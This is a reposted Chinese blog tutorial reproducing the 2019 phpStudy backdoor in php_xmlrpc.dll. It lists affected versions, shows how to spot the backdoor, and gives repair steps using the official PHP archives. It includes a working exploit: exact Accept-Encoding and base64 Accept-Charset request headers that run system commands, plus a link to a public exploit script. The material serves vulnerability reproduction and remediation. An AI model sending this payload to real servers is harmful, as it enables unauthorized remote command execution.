Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >集成环境phpstudy后门利用复现

集成环境phpstudy后门利用复现

作者头像
Power7089
发布于 2019-10-06 13:13:34
发布于 2019-10-06 13:13:34
1.1K00
代码可运行
举报
运行总次数:0
代码可运行

点击上方蓝色字体,我们一起努力!

0x00 简介


phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境

0x01 漏洞概述


使用广泛的PHP环境集成程序包phpStudy被公告疑似遭遇供应链攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门(来自雷神众测)

0x02 影响版本


phpStudy20161103版本:

php5.4.45与php5.2.17

phpStudy20180211版本:

php5.4.45与php5.2.17

0x03 环境搭建


公众号回复“phpstudy环境”,解压后无脑安装即可

0x04 漏洞利用


首先检测后门是否存在,后门位置:

\phpstudy\PHPTutorial\php\php-5.2.17\ext\

\phpstudy\PHPTutorial\php\php-5.4.45\ext\

找到目录下的php_xmlrpc.dll文件,用文本打开,搜索eval关键字:

如图所示,可判断存在后门

然后用存在漏洞的PHP版本进行启动服务,我使用的是5.4.45,切换版本的位置如图

然后随意访问一个php文件,拦截数据包,添加如下的请求头字段:

accept-Encoding中逗号后面的空格要去掉

Accept-Charset为system('ipconfig')的base64编码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
accept-Encoding:gzip,deflateAccept-Charset:c3lzdGVtKCdpcGNvbmZpZycpOw==

repeater重放数据包,成功触发后门:

0x05 修复方式


从PHP官网下载原始php-5.4.45版本或php-5.2.17版本,替换其中的php_xmlrpc.dll,下载地址:

https://windows.php.net/downloads/releases/archives/php-5.2.17-Win32-VC6-x86.zip

https://windows.php.net/downloads/releases/archives/php-5.4.45-Win32-VC9-x86.zip

检测工具

https://www.xp.cn/zijian/

后门利用脚本:

https://github.com/NS-Sp4ce/PHPStudy_BackDoor_Exp

参考链接:

https://mp.weixin.qq.com/s/dTzWfYGdkNqEl0vd72oC2w

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2019-09-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 小白帽学习之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
编辑精选文章
换一批
phpStudy后门漏洞复现
2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,可以正向执行任意php代码。
LuckySec
2022/11/02
2.8K0
phpStudy后门漏洞复现
phpStudy隐藏后门预警
近日,phpStudy被公告疑似遭遇黑客攻击,程序包自带PHP的php_xmlrpc.dll模块隐藏有后门,经网友确认phpStudy2016、phpStudy2018的部分版本有后门,建议使用该版本的用户立即进行安全加固处理。
洛米唯熊
2019/09/25
1.5K0
phpStudy隐藏后门预警
【实战篇】记一次蚁剑无文件连接phpstudy后门
Hello,这里是一名白帽的成长史~今天继续来分享一下HW期间的案例。在HW期间,发现某IP频繁发起扫描攻击。
一名白帽的成长史
2021/05/13
2K0
【实战篇】记一次蚁剑无文件连接phpstudy后门
PhpStudy之PHP调试环境集成包漏洞集
注意:本文分享给安全从业人员、网站开发人员以及运维人员在日常工作防范恶意攻击,请勿恶意使用下面介绍技术进行非法攻击操作。。
全栈工程师修炼指南
2022/09/29
1.1K0
PhpStudy之PHP调试环境集成包漏洞集
网站漏洞扫描 phpstudy后门代码的分析与测试
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详情,我们来安全分析一下,以及复现,漏洞修复,三个方面来入手。
技术分享达人
2019/09/27
1.7K0
网站漏洞扫描 phpstudy后门代码的分析与测试
PhpStudy 后门分析
2019/09/20,一则杭州警方通报打击涉网违法犯罪专项行动战果的新闻出现在我的朋友圈,其中通报了警方发现PhpStudy软件被种入后门后进行的侦查和逮捕了犯罪嫌疑人的事情。用PhpStudy的Web狗还挺多的,曾经我还是Web狗的时候也用过几天,不过因为不习惯就卸了。还记得当初会用PhpStudy的原因是在网上自学一些Web方向的课程时,那些课程中就是使用PhpStudy。在拿到样本后,我就对PhpStudy中的后门进行了一波逆向分析。
知道创宇云安全
2019/09/29
2K0
PhpStudy 后门分析
phpstudy RCE 复现
复现环境 phpstudy2016 +win10 复现过程 启动有漏洞的phpstudy pcat的检测脚本如下 python版本: # -*- coding:utf8 -*- __author__='pcat@chamd5.org' __blog__='http://pcat.cc' import os import string import re def strings(file) : chars = string.printable[:94] shortestReturnCha
用户5878089
2019/10/13
1.4K0
phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析
各位FreeBuf观众的姥爷大家好,我是艾登——皮尔斯(玩看门狗时候注册的ID),最近安全圈好不热闹,北京时间9月20日“杭州公安”官微发布了“杭州警方通报打击涉网违法犯罪暨’净网2019’专项行动战果”推文,该“后门”无法被杀毒软件扫描删除,并且藏匿于软件某功能性代码中,极难被发现具有免杀性质。严重的威胁到了互联网的空间安全,让大量的互联网网名的个人隐私信息遭到存在大面积泄露的风险,这篇文章分为图文教程和视频教程(文章末尾)。
FB客服
2019/10/22
1.6K0
phpStudy远程RCE漏洞复现以及沦陷主机入侵溯源分析
数十万PhpStudy用户被植入后门,快来检测你是否已沦为“肉鸡”!
北京时间9月20日,杭州公安发布《杭州警方通报打击涉网违法犯罪暨‘净网2019’专项行动战果》一文,文章曝光了国内知名PHP调试环境程序集成包“PhpStudy软件”遭到黑客篡改并植入“后门”。截至案发,近百万PHP用户中超过67万用户已被黑客控制,并大肆盗取账号密码、聊天记录、设备码类等敏感数据多达10万多组,非法牟利600多万元。
FB客服
2019/09/24
1.5K0
数十万PhpStudy用户被植入后门,快来检测你是否已沦为“肉鸡”!
使用 Ghidra 分析 phpStudy 后门
这次事件已过去数日,该响应的也都响应了,虽然网上有很多厂商及组织发表了分析文章,但记载分析过程的不多,我只是想正儿八经用 Ghidra 从头到尾分析下。
知道创宇云安全
2019/10/22
8540
使用 Ghidra 分析 phpStudy 后门
新手php环境一键安装包,PHP运行环境一键安装包(phpStudy2013)
本程序包集成了最新版的Apache+PHP+MySQL+phpMyAdmin,一次性安装后无须配置即可使用,是非常方便与好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了PHP开发手册等。总之学习PHP只需一个包。
全栈程序员站长
2022/11/01
2.7K0
新手php环境一键安装包,PHP运行环境一键安装包(phpStudy2013)
看我如何拿下BC站的服务器
先进行简单的信息收集,通过Wappalyzer插件可见php版本与windows serve这两个比较重要的信息
HACK学习
2020/11/03
1.8K0
看我如何拿下BC站的服务器
phpstudy后门文件分析以及检测脚本
2019.9.20得知非官网的一些下载站中的phpstudy版本存在后门文件,基于研究的目的,于是有了以下这文。
ChaMd5安全团队
2019/09/25
1K0
phpstudy后门文件分析以及检测脚本
phpStudy后门简要分析
注:这两个官网下载的版本里,都没有发现php5.3版本下存在有问题的php_xmlrpc.dll,打开时会提示存在pdb路径信息。
FB客服
2019/09/29
1.2K0
phpStudy后门简要分析
php安装redis扩展(PHP5.6或7.1为例)
http://windows.php.net/downloads/pecl/snaps/redis
超级小可爱
2023/02/20
2.3K0
Windows 下搭建 MySQL+Apache +PHP 环境
由于项目涉及到 php 项目,本地需要搭建一个 php 的调试环境。网上查询了解到,可以用的 php 集成环境(如:phpstudy,xampp等),本次记录使用 php+mysql+apache 在本地独立搭建PHP运行环境。方便有需要的童鞋... 需要相关软件包以及工具:
AI码真香
2022/09/13
2.8K0
Windows 下搭建  MySQL+Apache +PHP 环境
phpMyAdmin 渗透利用总结
二、phpMyAdmin利用: phpMyAdmin的漏洞多为经过验证后的才能利用,所以需要进入后台,可以采用爆破的方式进入后台,常用的有:
重生信息安全
2020/03/06
4.5K0
phpStudy默认配置致Nginx解析漏洞复现
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。
Timeline Sec
2020/09/15
1.9K0
phpStudy默认配置致Nginx解析漏洞复现
WAMP环境配置
经过以上的步骤,一个 WAMP 的开发环境就配置好了,基本上能够满足开发一般应用的需要。
大江小浪
2018/07/25
2.3K0
PHPSTROM中xdebug调试配置和基本使用
当我们进行代码审计的时候,必不可少的就是debug。为了后面更加方便清晰的解释漏洞产生的原因和执行流程。特作此篇帮助像我一样的小白更好的学习!
黑白天安全
2021/03/16
1.1K0
PHPSTROM中xdebug调试配置和基本使用
相关推荐
phpStudy后门漏洞复现
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档
本文部分代码块支持一键运行,欢迎体验
本文部分代码块支持一键运行,欢迎体验